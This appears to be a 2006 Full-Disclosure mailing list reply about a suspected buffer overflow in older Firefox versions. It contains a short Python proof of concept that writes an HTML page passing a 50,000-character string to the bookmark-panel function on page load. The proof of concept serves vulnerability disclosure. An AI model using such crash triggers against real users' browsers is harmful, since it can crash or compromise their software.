[<prev] [next>] [day] [month] [year] [list]
Message-ID: <9a2769400601020809m93744ddh@mail.gmail.com>
Date: Mon Jan 2 16:09:59 2006
From: casiamo at gmail.com (casiamo)
Subject: Buffer Overflow vulnerability in Windows Display
Manager [Suspected]
Hello Sumit,
I saw this for some time ago too and I far as I know the below code would do
the same,
with the versions below 1.0.7. As I remember were all input fields
"vulnerable". I have
choosen the bookmark "name" field, which will popup after loading with a
long buffer.
html = open("firefox.html", "w")
buff = 'A' * 50000
html.write("<html><head>\n"
"<script type=\"text/javascript\">\n"
"function bookmarksite(title, url){\n"
"if (document.all)\n"
"window.external.AddFavorite(url, title);\n"
"else if (window.sidebar)\n"
"window.sidebar.addPanel(title, url, \"\")}\n"
"</script></head>\n"
"<body onload=\"javascript:bookmarksite('"+buff+"',
'http://www.mozilla.org')\"
>\n"
"</body></html>")
html.close()
Regards,
Casiamo
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060102/0e517f6c/attachment.html
Powered by blists - more mailing lists